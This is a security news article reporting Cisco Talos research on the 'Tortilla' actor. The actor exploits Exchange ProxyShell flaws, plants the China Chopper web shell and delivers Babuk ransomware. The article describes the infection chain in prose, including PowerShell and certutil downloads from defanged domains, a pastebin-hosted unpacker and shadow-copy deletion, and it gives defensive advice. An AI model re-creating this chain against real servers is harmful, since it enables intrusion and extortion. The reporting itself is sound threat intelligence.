The Microsoft Exchange Proxy Shell vulnerabilities are being exploited yet again for ransomware, this time with Babuk from the new “Tortilla” threat player.
A ‘newish’ threat player sometimes known as “Tortilla” is launching a fresh round of Proxy Shell attacks on Microsoft Exchange servers, this time with the aim of inflicting vulnerable servers with variants of the Babuk ransomware.
Cisco Talos researchers stated in a Wed. report that they spotted the malicious campaign a few weeks ago, on Oct. 12.
Tortilla, a player that has been operating since July, is mainly targeting US victims. It is also hurling a smaller number of infections that have hit machines in Brazil, Finland, Germany, Honduras, Thailand, Ukraine & the UK.
PowerCat
Prior to this ransomware-inflicting campaign, Tortilla has been experimenting with other payloads, such as the Power Shell-based netcat clone PowerCat.
Netcat is a networking utility for reading from & writing to network connections using TCP or UDP, designed to be a dependable back-end that can be used directly or easily driven by other programs & scripts.
PowerCat has a liking for Windows, the researchers explained, being “known to provide attackers with unauthorised access to Windows machines.”
New Attack Surface
Proxy Shell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) & to catch plaintext passwords.
The attack was outlined in a presentation (PDF) given by Devcore Principal Security Researcher Orange Tsai at Black Hat in Las Vegas in April. In it, Tsai disclosed an entirely new attack surface in Exchange, & a barrage of attacks soon followed. Aug. was full of reports of threat players exploiting Proxy Shell to launch webshell attacks, as well as to deliver LockFile ransomware..
Infection Chain
In this latest Proxy Shell campaign, Cisco Talos researchers explained that the threat player is using “a somewhat unusual infection chain technique where an intermediate unpacking module is hosted on a pastebin.com clone pastebin.pl” to deliver Babuk.
They continued: “The intermediate unpacking stage is downloaded & decoded in memory before the final payload embedded within the original sample is decrypted & executed.”
Babuk?
Babuk is a ransomware that’s probably best known for its ‘starring role’ in a breach of the Washington D.C. Police Force in April. The gang behind the malware has a short history, having only been identified in 2021, but that history shows that it’s a double-extortion player: 1 that threatens to post stolen data in addition to encrypting files, as a way of applying thumbscrews so victims will pay up.
That tactic has worked. As McAfee described in Feb., Babuk the ransomware had already been lobbed at a batch of at least 5 big enterprises, with 1 score: The gang walked away with $85k after 1 of those targets paid the money, McAfee researchers revealed.
Its victims have included Serco, an outsourcing firm that confirmed that it had been slammed with a double-extortion ransomware attack in late Jan.
Like many ransomware types, Babuk is ruthless: It not only encrypts a victim’s machine, it also ‘blows-up’ backups & deletes the volume shadow copies, Cisco Talos stated.
What Makes Babuk Work
On the technical side, Cisco Talos described Babuk as a flexible ransomware that can be compiled, through a ransomware builder, for several hardware & software platforms.
It is mostly compiled for Windows & ARM for Linux, but researchers observed that, over time, they have also seen versions for ESX & a 32-bit, old PE executable.
In this recent Oct. campaign though, the threat players are specifically targeting Windows.
‘China Chopper ‘
Part of the infection chain involves China Chopper: A web-shell that dates back to 2010 but which has clung to relevancy since, including reportedly being used in a massive 2019 attack against telecommunications providers called Operation Soft Cell.
The web-shell enables attackers to “retain access to an infected system using a client-side application which contains all the logic required to control the target,” as Cisco Talos described the web-shell in 2019.
This time, it is being used to get to Exchange Server systems. “We assess with moderate confidence that the initial infection vector is exploitation of Proxy Shell vulnerabilities in Microsoft Exchange Server through the deployment of China Chopper web shell,” according to the Cisco Talos write-up.
Infection Chain
As shown in the infection flow chart below, the players are using either a DLL or .NET executable to kick things off on the targeted system. “The initial .NET executable module runs as a child process of w3wp.exe & invokes the command shell to run an obfuscated Power Shell command,” according to Cisco Talos’ report.
“The PowerShell command invokes a web request & downloads the payload loader module using certutil.exe from a URL hosted on the domains fbi[.]fund & xxxs[.]info, or the IP address 185[.]219[.]52[.]229,” researchers commented.
Unpacking Stage
“The payload loader downloads an intermediate unpacking stage from the Paste Bin clone site pastebin.pl,” they continued – a site that “seems to be unrelated to the popular pastebin.com.”
They went on: “The unpacker concatenates the bitmap images embedded in the resource section of the trojan & decrypts the payload into the memory. The payload is injected into the process AddInProcess32 & is used to encrypt files on the victim’s server & all mounted drives.”
Tortilla’s Infrastructure
Besides the pastebin.pl site that hosts Tortilla’s intermediate unpacker code, Tortilla’s infrastructure also includes a Unix-based download server.
The site is legitimate, but Cisco Talos has seen multiple malicious campaigns running on it, including hosting variants of the Agent Tesla trojan & the FormBook malware dropper.
Code Spill Helps Newcomers
In July, Babuk gang’s source code & builder were spilled: They were uploaded to Virus Total, making it available to all security vendors & competitors. That leak has helped the ransomware spread to even an inexperienced, ‘green’ group like Tortilla, Cisco Talos explained.
The leak “may have encouraged new malicious actors to manipulate & deploy the malware,” researchers noted.
“This actor has only been operating since early July this year & has been experimenting with different payloads, apparently in order to obtain & maintain remote access to the infected systems,” according to its write-up.
Source Code
With Babuk source code readily available, all the Tortilla players have to know is how to ‘tweak’ it a little, researchers stated: A situation that observers predicted back when the code appeared.
“The actor displays low to medium skills with a decent understanding of the security concepts & the ability to create minor modifications to existing malware & offensive security tools,” Cisco Talos researchers outlined in assessing the Tortilla gang.
Does Not Work on Variant
While a free Babuk decryptor was released last week, it won’t work on the Babuk variant seen in this campaign, according to the write-up:
“Unfortunately, it is only effective on files encrypted with a number of leaked keys & cannot be used to decrypt files encrypted by the variant described in this blog post.”
Keep Exchange Safe
Tortilla is hosting malicious modules & conducting internet-wide scanning to exploit vulnerable hosts.
The researchers recommended staying vigilant, staying on top of any infection in its initial stages & implementing a layered defence security, “with the behavioural protection enabled for endpoints & servers to detect the threats at an early stage of the infection chain.”
They also recommended keeping servers & apps updated so as to squash vulnerabilities, such as the 3 CVEs exploited in the Proxy Shell attacks.
Deletes Shadow Copies
Also, keep an eye out for backup demolition, as the code deletes shadow copies:
“Babuk ransomware is nefarious by its nature & while it encrypts the victim’s machine, it interrupts the system backup process & deletes the volume shadow copies,” according to Cisco Talos.
In addition, strengthen detection: Watch out for system configuration changes, suspicious events generated by detection systems for an abrupt service termination, or abnormally high I/O rates for drives attached to servers, concluded Cisco Talos.
https://www.cybernewsgroup.co.uk/virtual-conference-november-2021/